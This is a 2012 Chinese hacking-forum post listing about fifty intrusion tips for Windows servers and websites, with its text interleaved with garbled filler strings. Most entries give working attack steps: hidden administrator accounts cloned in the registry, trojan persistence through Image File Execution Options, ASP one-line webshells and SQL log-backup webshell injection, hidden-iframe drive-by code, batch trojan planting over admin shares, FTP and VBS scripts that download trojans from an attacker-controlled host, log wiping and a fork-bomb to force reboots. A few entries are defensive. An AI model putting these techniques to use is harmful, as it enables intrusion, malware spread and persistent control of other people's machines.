中国网络渗透测试联盟
标题:
一些笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:51
标题:
一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
) N; k0 _' F6 t0 R, v- @
cacls C:\windows\system32 /G hqw20:R
# y# {, _; E3 `) g$ M
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
$ `4 P! _/ i% A5 e, b6 L8 Y
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
1 A1 ~5 e+ ?) R: U
2 X" U2 z% [8 r |" H7 O. v
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
# D" b _2 O0 e4 D8 m$ J
8 V) A6 c; ?& I
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 ]% V4 p: W6 @" O* u: p+ v
, X E" z1 s& w/ s
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
5 _$ y! b( v; s* p
0 _7 a% L" E" s1 F) J
5、利用INF文件来修改注册表
0 G, ~5 J* |: t! q/ k! s4 B8 S
[Version]
1 i8 B. O: L% \0 ?
Signature="$CHICAGO$"
6 u) Y9 I# H! i0 J
[Defaultinstall]
9 {) ~+ |/ p# e- m( q& l
addREG=Ating
1 A) V4 ?, L3 l- t+ w& X5 m3 `
[Ating]
: O8 O \6 f# {& l7 |" T
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
- Q: f. A2 s# R, z
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
# N. B# }: L" z9 j% w! D
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
2 `6 o3 b, W* G* T* r$ H" Y; |: W
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
1 Y" j' L& C- ? R: a, [+ n
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
( @) m2 g% s6 V+ Q
HKEY_CURRENT_CONFIG 简写为 HKCC
1 o4 m5 E7 e N9 [/ }1 X
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
8 Q. K- x; Z6 t& d3 `: |- K: F
"1"这里代表是写入或删除注册表键值中的具体数据
, P- e7 ^3 Z4 |; C" `* x @- \
r% _0 ^& M. c5 ]* ?7 J0 d* @! X
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
! k, K" N" A# g7 V w
多了一步就是在防火墙里添加个端口,然后导出其键值
$ ?! ^6 x0 i7 Y- X
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
, [4 y2 Q; E7 \( a* b1 q. }- e" `
/ V7 u# E( i- p: j
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
% r. x$ L$ m9 |* Q8 @# x: V* A2 Y
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
. O V4 M5 O( w5 j7 r
! ~6 Y4 p I; }2 d) S' x6 P t
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
! x: f1 d5 N. E0 V* D! {) K: G- s
% A8 |; y' E* I$ d; X" N
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
B# J& I6 n# b+ ~1 K+ W/ z" N) c
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
3 X4 A/ C/ b+ r6 m4 Y
7 Y8 w r6 T9 ^ m
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
, |9 E" z5 r2 e' ^4 j
+ v1 y+ ?7 ^- Q% P) _8 c' U
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
7 g3 a# V5 {/ e; R/ @# a
用法:xsniff –pass –hide –log pass.txt
% U( N5 O% _# f! K. q( I+ t8 u
' F) A6 ~$ }2 l) Y' R: o
12、google搜索的艺术
! [& Y ^1 v' U5 o- H. P
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
& y( i: `* g: ?+ N! R6 t
或“字符串的语法错误”可以找到很多sql注入漏洞。
+ E+ B4 r- c: \5 @! ]
; c5 w- H% e. l3 U
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
; u9 r. K Q! T! b9 A; N/ S
6 S: e( w7 ?; S# y& u
14、cmd中输入 nc –vv –l –p 1987
/ [+ ? ~5 t& ?8 f# Q
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
0 p, S- V v0 n4 J" n
% [7 l8 o A s5 ^2 a
15、制作T++木马,先写个ating.hta文件,内容为
3 f6 M1 r3 c1 l b0 ^* |! A4 s
<script language="VBScript">
, z' [+ g# t: A
set wshshell=createobject ("wscript.shell" )
( }: H$ H& G- ^: ?" X. s
a=wshshell.run("你马的名称",1)
( Y( { ~( \- K3 Q0 G" v
window.close
# e2 w1 x8 k4 v0 O
</script>
* |) q6 r% N X/ U6 D
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
/ L E/ D5 y G, t8 ^
- _7 p# ?5 `. [6 k
16、搜索栏里输入
( x1 M6 Q8 F3 ~% Y; Y1 i: s
关键字%'and 1=1 and '%'='
2 J, A/ f# y9 w9 G: {3 j3 L* E) j
关键字%'and 1=2 and '%'='
3 Q, J' g+ s [$ B0 U' p
比较不同处 可以作为注入的特征字符
- v9 k, u) D) o, T
8 q$ c7 I2 |' Z* r, V
17、挂马代码<html>
, [/ ]7 A6 U" C2 F
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
$ ?. {3 n/ q8 [
</html>
; A: A& ~7 ]8 G% K, q
4 R; j& Q" j' Y0 s
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
3 {( Y$ `0 x5 W% |* _& S& P( R" u
net localgroup administrators还是可以看出Guest是管理员来。
/ }; S) X- U, K p' S
4 o* Q- C5 W0 g# x, j: \
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
2 O$ M. a6 y. q8 o; o
用法: 安装: instsrv.exe 服务名称 路径
- o" q" T) J4 J$ w9 S" a
卸载: instsrv.exe 服务名称 REMOVE
3 ^) k9 r7 r! b7 E( ` u
& |0 o3 v# W3 d: }
@. e; u4 Y; n
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
4 @' c2 Q5 m2 S7 c$ E$ F
不能注入时要第一时间想到%5c暴库。
2 M$ x1 }6 a- X$ H# b: r+ M/ G
; @. ^- n% G6 j) _! g) G. W: F$ |
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
3 h, b" a8 A$ ~4 c6 i
" L( A) J& c$ x$ B Y; @
23、缺少xp_cmdshell时
. D3 u" n, \8 `; Q1 A
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
m B8 w. q* J
假如恢复不成功,可以尝试直接加用户(针对开3389的)
* y: Q. y6 Y" o; m
declare @o int
& X# N6 K- {: `3 X' v$ H
exec sp_oacreate 'wscript.shell',@o out
W% F; [. ~- m
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
) f) ~8 m3 ]/ F, Y
$ Q& ?2 Y! Q9 A7 O7 b& H1 J
24.批量种植木马.bat
# V4 n+ U. O0 Q/ w, z. ?
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
! q, N1 M5 j& O* r
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
1 F1 t" C2 s- M* [( j3 K# q e7 _3 j; K
扫描地址.txt里每个主机名一行 用\\开头
- y7 g, ~8 L7 y, Q7 K" v; k
. ]& L' r. O8 j* x5 n0 o3 b
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
3 a0 y$ C4 T! u7 c" ?: p; f# c. S& W
- F6 w; h2 G8 a' P7 _6 N
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
* l6 X9 o( c+ X+ [6 B, w7 `
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
/ B6 ~8 l5 I) ]8 s% Y
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
- a* u2 \$ O) d, q# b v
. e6 B; C/ i1 O' R- g4 n. H
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
( v7 U/ U: r* P
然后用#clear logg和#clear line vty *删除日志
& u# K8 z* b8 {7 X. x: T
, r8 ] ]% v U) |
28、电脑坏了省去重新安装系统的方法
+ E" A+ l, t: A7 z, {6 |) N
纯dos下执行,
3 I3 _% i& W0 J. r; }9 y
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
, m% [. [3 v& D/ F; Z
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
! O5 [ @2 ~/ z7 ~4 I
/ o/ z: e# Z% S1 ]
29、解决TCP/IP筛选 在注册表里有三处,分别是:
9 L2 @: W" _2 N/ z, q
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
6 B# @; r4 b( @3 J
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 L" B2 ?9 B: ~6 u) {3 n/ y) W0 q7 u
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
l l' p/ q7 {
分别用
' G: s5 d' L. z$ ^2 l
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* h1 G% Z# e6 r+ h9 B
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
; c, ^( S! r }( {5 ^7 Y
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, Y) U" ^9 k( Z% w. ]9 W
命令来导出注册表项
3 i% F M: O7 P( h- {% W
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
9 U, J9 K: D/ x. A
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
; A) Z: J X: d" v7 c
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
# e4 [2 x3 m* p& ~! d0 z7 T* e
% j0 A6 L& `1 U. W4 }) \8 C
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
0 a7 n6 I: T, g" U O7 b, [% Y$ t; W' a5 F
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
( i) j5 z; c; f7 C/ ~
# q1 c3 u5 Z6 V. z
31、全手工打造开3389工具
; u7 R5 s: g: N0 k$ K1 M
打开记事本,编辑内容如下:
1 e4 g& j% C& q& G4 f
echo [Components] > c:\sql
" d' L% I c7 R" R2 s% q3 i
echo TSEnable = on >> c:\sql
7 U4 X2 f' A9 y5 i& N
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
/ e3 |- o) A0 \& o8 s
编辑好后存为BAT文件,上传至肉鸡,执行
" P* r& p j/ ?! O/ u. M. H* _
" M' Y* Q! ]0 _2 B+ |' L
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
3 P; G" ~7 v$ c% ~$ T) s
7 d1 s) X1 G- u) e; F
33、让服务器重启
% z) C* F9 U8 X) F4 E# m; @8 u8 Y; P
写个bat死循环:
+ \8 y% V. h: K) n0 \
@echo off
8 v5 k4 [0 t" K0 N) V
:loop1
+ `, z& c+ L) [ J; E+ n
cls
% Q. o4 u0 ?0 {1 l/ Y
start cmd.exe
+ n9 [& r/ f$ y" T) V$ q* @( M
goto loop1
* M# |- ?$ g1 [# f( y
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
* M& r' i, E" c* q
4 U$ i3 ^7 G" R" i7 v+ S* X! e
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- q/ g5 y1 y% G7 I
@echo off
/ z1 [' g% |) L* g* }5 `2 V* ]
date /t >c:/3389.txt
) }! @! m* O* V: g1 k+ ^1 w
time /t >>c:/3389.txt
# M: @5 u1 u6 f+ o' ?
attrib +s +h c:/3389.bat
* E7 E0 A8 a3 [' y8 e
attrib +s +h c:/3389.txt
# a+ X$ J! l9 H4 D2 d- X( f H
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
! f8 V ^8 u0 ?" X
并保存为3389.bat
% |9 ?1 Q0 v. R7 f# S
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
7 Y& ?9 n" @; c2 l1 z
) ^ r( ` G0 ~
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
3 z8 O% c0 @. X* ~
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
0 y8 l* O9 C/ W9 l* r( w$ X: R# z: D. p2 J
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
3 w% e2 ]* _ {7 l2 D& J! r- y r
- O" U% z5 [% c: y# Z1 ~* b
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
1 K" L. e) v) m8 [
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
& ~/ L2 P8 O9 G( E' u- I/ @
echo 你的FTP账号 >>c:\1.bat //输入账号
. B# T+ t" o) q) @2 h% T- g. a& v
echo 你的FTP密码 >>c:\1.bat //输入密码
/ L: ]2 z, D6 F. ~0 P* L
echo bin >>c:\1.bat //登入
3 S( K2 M' |4 N8 C( d: v- _
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
1 Y$ Y5 _$ R5 i w& G1 x0 u
echo bye >>c:\1.bat //退出
: T1 `2 G* P7 |! |+ x# t# {
然后执行ftp -s:c:\1.bat即可
* P. [" ^1 l$ Y3 l% v) E
$ k: [0 S6 _# \' N* _
37、修改注册表开3389两法
6 _0 \# g5 u% ]( b) d% N, r
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
* m1 v" w( l+ z- Z" h
echo Windows Registry Editor Version 5.00 >>3389.reg
6 j! F% v1 O1 r$ G/ B8 _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
( k# r |$ C" p# S
echo "Enabled"="0" >>3389.reg
3 T5 t0 v8 M" H9 }' ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
! Z8 j: z: q$ z/ M$ E- _0 O
NT\CurrentVersion\Winlogon] >>3389.reg
, j2 P4 I$ C9 u! ~
echo "ShutdownWithoutLogon"="0" >>3389.reg
" G8 F3 |! C0 z: s+ [( j0 `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
: h+ T7 \. Q( S6 Z5 N
>>3389.reg
. I [+ B) g; ^+ C
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ X; A6 S s5 T9 H/ h+ Y# r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
" h5 m+ S, E) w* c* b: ^& K# } U9 a* V
>>3389.reg
t8 Q, o0 G0 O) Q
echo "TSEnabled"=dword:00000001 >>3389.reg
/ D5 {0 J P+ K, c) F9 E3 ?, G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
6 j/ _: a+ g$ i% v0 J% L! {
echo "Start"=dword:00000002 >>3389.reg
+ [! |9 Y# ^- J6 }- U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
& e, e9 j8 q' S5 _
>>3389.reg
% m L/ y L" k
echo "Start"=dword:00000002 >>3389.reg
* I2 q; g; v/ t: ^( I
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
7 Z {$ H# \) K9 t# r" O
echo "Hotkey"="1" >>3389.reg
8 H& a5 K! ~% }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! G& v, U( F. m3 |2 z* ~
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
q: [1 W+ j/ G& e( W7 H r
echo "PortNumber"=dword:00000D3D >>3389.reg
/ O8 z1 W" y0 P6 i/ c+ y5 M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 Y- c9 }2 i) o0 c
Server\WinStations\RDP-Tcp] >>3389.reg
3 d5 f! B# B9 {0 R$ ^
echo "PortNumber"=dword:00000D3D >>3389.reg
^" ~& h% ], A; p
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
! U4 G/ u( H7 F+ e1 |4 r
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
( ?" }4 _7 D6 X; z
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
5 h( m( f/ Q4 \' t, _! @8 G, z5 D
(2)winxp和win2003终端开启
+ L/ l3 ^4 `3 T' P; }7 ]
用以下ECHO代码写一个REG文件:
" k1 m$ J( e. G0 x7 U
echo Windows Registry Editor Version 5.00>>3389.reg
# s6 Y9 L# i, B7 [: f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. r( O3 d3 X: M# N9 A/ J
Server]>>3389.reg
, ~6 t* X, L: s2 O4 m g/ n
echo "fDenyTSConnections"=dword:00000000>>3389.reg
( O- y: V2 _, f2 j$ e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ B7 m& N. Y9 y6 o. d& m5 s. }
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
/ f. O9 M; G3 ^% i2 j' ]
echo "PortNumber"=dword:00000d3d>>3389.reg
( V% }0 P. \! ^8 J) q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 R: O: |- m: o+ b4 {
Server\WinStations\RDP-Tcp]>>3389.reg
1 S$ v" }$ g' v# Q( x f
echo "PortNumber"=dword:00000d3d>>3389.reg
7 Y ^9 t$ a& b7 \3 ~
然后regedit /s 3389.reg del 3389.reg
/ T3 p6 _7 g$ d
XP下不论开终端还是改终端端口都不需重启
; L4 @$ f. W: I
2 p' ?# d# L1 T, n
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
1 {4 E9 s* q; c: u9 E, `
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
+ Y" K7 y4 [1 c( T& e, N3 h
_8 M$ R5 S# T7 ^/ y
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
- X- A5 t3 \* m( m) @
(1)数据库文件名应复杂并要有特殊字符
5 A- V9 ]+ w4 o) @! ~; N1 Y
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
+ M; n: `, \* M
将conn.asp文档中的
" t/ ?- Z0 b$ o( ?
DBPath = Server.MapPath("数据库.mdb")
' M Q1 Y1 D( E! y
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
0 l# n8 t- ~, n+ y- u, I/ H0 d
S& u$ W; o% S. ?
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
2 z. d- S" F, [; e B9 @5 X, E
(3)不放在WEB目录里
. ~6 a. X" |) Y( x
7 S3 D8 G- q# u; @5 G
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
+ z9 X1 R: e3 O$ \
可以写两个bat文件
& A* X$ z; ?) B3 C
@echo off
+ A6 q6 c9 f3 S
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
# u; n( _3 ]8 y% Y) k
@del c:\winnt\system32\query.exe
- j3 ? e/ M4 ~: d/ Z
@del %SYSTEMROOT%\system32\dllcache\query.exe
1 L- K+ \2 J- z O. u7 y9 s( C
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
* J% j d# J* a: c$ w9 c1 T
3 Q0 ?/ d" g) D( V8 E
@echo off
( j- O7 E- R; _- I9 K
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
! ?' p# l# b7 c0 c3 T- \
@del c:\winnt\system32\tsadmin.exe
" E/ h' }# H3 v7 J' l) o, H4 N
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
' w$ K8 S" W" g1 R
' L2 x, z% }+ B3 ~3 j. Q
41、映射对方盘符
. K: c; `, F) G0 G0 n7 V
telnet到他的机器上,
! Z- n w$ z& h7 \
net share 查看有没有默认共享 如果没有,那么就接着运行
& d3 z" S' R5 ?, G( M8 m' y
net share c$=c:
6 v" s" Q4 W) W
net share现在有c$
0 z3 `& r5 S% M5 A/ b* v1 T. Q
在自己的机器上运行
1 ], N- l1 \! H' N' ^( p
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
4 c# a4 \& @! m+ A# k3 k
+ _. e% ]2 D M/ F2 D& j7 K
42、一些很有用的老知识
8 ~+ o- x4 ~* d. @- p
type c:\boot.ini ( 查看系统版本 )
. p6 A3 X1 f7 ^. b+ ~0 ?
net start (查看已经启动的服务)
0 a- X! ~0 J I. `
query user ( 查看当前终端连接 )
" M* C) K1 d8 y; E. y
net user ( 查看当前用户 )
, v) f! P5 a9 ~7 S ~ b- c
net user 用户 密码/add ( 建立账号 )
1 `6 l, S7 U+ m4 a
net localgroup administrators 用户 /add (提升某用户为管理员)
' d" V4 Y3 h q# d8 L2 J. X- V
ipconfig -all ( 查看IP什么的 )
5 C+ d: b# j% q. A# h1 B
netstat -an ( 查看当前网络状态 )
& U. C, g: D: q
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
1 o! y& \! H/ J; R$ D7 Y$ _
克隆时Administrator对应1F4
% C$ V; |, R4 O& X) o. T7 @
guest对应1F5
3 L* J$ S+ m9 f6 D. I' n2 Y
tsinternetuser对应3E8
% I$ A1 p6 D6 r4 c& g% p
4 _2 }/ e: \* t" ~8 C3 b; Y+ ?! y: ^
43、如果对方没开3389,但是装了Remote Administrator Service
/ I; \: z, `! f. Q3 k- j
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
s* S5 }& k& w P6 Z# e% h
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
/ y2 B3 n7 S, u/ {
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
. {0 r8 I" ~" H; N
, `- Z$ Q& d- i! l2 v* A
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; J p' N8 t: M/ E9 b2 V
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
4 t7 k5 I- K$ ]5 q% y/ p0 I2 z
, R% S0 G7 d0 i; d
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
$ f3 O+ L: L3 o H
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
+ [- [) R3 s u" f! N1 }9 l& g0 r
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
9 V3 _4 G9 n! I/ p/ T
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
6 u! f* @* M/ x3 ?
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
- V8 K0 [* w& Y0 |
(这是完整的一句话,其中没有换行符)
% s; x$ ^* l8 ~. Z2 X
然后下载:
! I) x( M, {) S0 ?' h) x
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
0 J! B8 |: o6 N, Q
1 B7 @' B/ Y$ Y8 D0 H3 E& E9 h
46、一句话木马成功依赖于两个条件:
# q6 y+ h0 w+ w1 O" A( Y2 }
1、服务端没有禁止adodb.Stream或FSO组件
' @7 ?- k& a9 ^# W
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
* B% A1 s! X3 I
" k. X- x' d! S& q+ o
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
" E) i# T- \) |; f
;alter database utsz set RECOVERY FULL--
8 l, t& Y* o9 m7 M0 b( P
;create table cmd (a image)--
3 e: P$ U) \, f+ I! e, E* \' \
;backup log utsz to disk = 'D:\cmd' with init--
- X% Y5 l! }! R p- t( t/ m3 R
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
2 A/ l% s5 w3 T( g$ n
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
2 G& F* ^& q; l3 i0 F# S
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
+ K. j" [* v. q, A
" ~ e5 H2 ^) s
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
! W. u2 m; }7 B3 ~
" J, b0 o+ G( z1 V* Y f4 A7 A) P
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
$ @- ]6 v# C6 M
所有会话用 'all'。
, O( b3 f4 E/ h$ z5 v# ~" M8 }
-s sessionid 列出会话的信息。
; @ B, P. L+ X5 d/ I) ~% L
-k sessionid 终止会话。
+ J# f. }& _: q4 S% A3 K
-m sessionid 发送消息到会话。
+ w6 I2 T# ~- w
. q) M; s5 p. A! \" q, P- i1 E9 H1 q0 ^
config 配置 telnet 服务器参数。
2 J/ |9 A! t( a( S
) a; ], l6 r- ]
common_options 为:
) [( A% W# r. h7 o/ B# }
-u user 指定要使用其凭据的用户
* b. d, S& _$ W4 W: b' ~3 K" U
-p password 用户密码
, z% n/ {. i# t1 ], y/ \
' C! w" l5 k8 |: U8 v. R
config_options 为:
5 T1 }8 @ J* Z% `
dom = domain 设定用户的默认域
7 V) _4 o: v3 Y* ]
ctrlakeymap = yes|no 设定 ALT 键的映射
* U1 ^0 G% `1 i0 {: P7 C
timeout = hh:mm:ss 设定空闲会话超时值
' b: ?6 |: R- o7 a# Y
timeoutactive = yes|no 启用空闲会话。
, \6 D" d$ Y# P
maxfail = attempts 设定断开前失败的登录企图数。
% r# E" f \1 B( @
maxconn = connections 设定最大连接数。
8 J: E1 Q7 h! O! S0 r- o3 L% T, l/ F
port = number 设定 telnet 端口。
+ [+ i5 [0 j' s9 w4 ^
sec = [+/-]NTLM [+/-]passwd
4 ` D. T. Z9 A$ c$ i* a! c
设定身份验证机构
* D5 n* z- |0 K, q
fname = file 指定审计文件名。
7 n" V# g1 t/ P9 w# I
fsize = size 指定审计文件的最大尺寸(MB)。
' R$ |: p1 e7 c% c( u( W4 F
mode = console|stream 指定操作模式。
. D3 P3 Z* j' Z+ B
auditlocation = eventlog|file|both
8 e7 x6 Q9 S- q/ ]+ `' M5 I8 K
指定记录地点
- p' R1 M7 a% |+ p/ N; h
audit = [+/-]user [+/-]fail [+/-]admin
$ o! d/ R; G% z
/ ^5 F: R3 y7 |0 O& |% ~7 R( b
49、例如:在IE上访问:
4 x# D" b9 ]1 I
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
, F+ i9 }- c9 s/ o8 m6 Z
hack.txt里面的代码是:
. u* b' L0 I. I
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
; X5 y0 c6 K# [ |3 O: s* ]
把这个hack.txt发到你空间就可以了!
- |7 I G$ h& H i' F! }
这个可以利用来做网马哦!
- u" ?" z' F: N h: G3 ~, P1 J
! m7 B: C& y4 I v2 a6 ]+ S& ]6 K5 `
50、autorun的病毒可以通过手动限制!
2 _- R% p1 A3 z1 Q
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
5 l0 i# Z5 n# w/ g
2,打开盘符用右键打开!切忌双击盘符~
0 Q& R/ @& B" [8 O2 u, g% C
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
7 K" f! o; ?" _4 j# A2 j) }
$ o8 ^% n6 @& `; Z& S
51、log备份时的一句话木马:
8 k8 R; ^& e) w& Z+ q# w$ d: Q
a).<%%25Execute(request("go"))%%25>
. c F: Y4 N- r8 Q7 R. M5 x
b).<%Execute(request("go"))%>
! m- N3 W# _6 r$ s, B
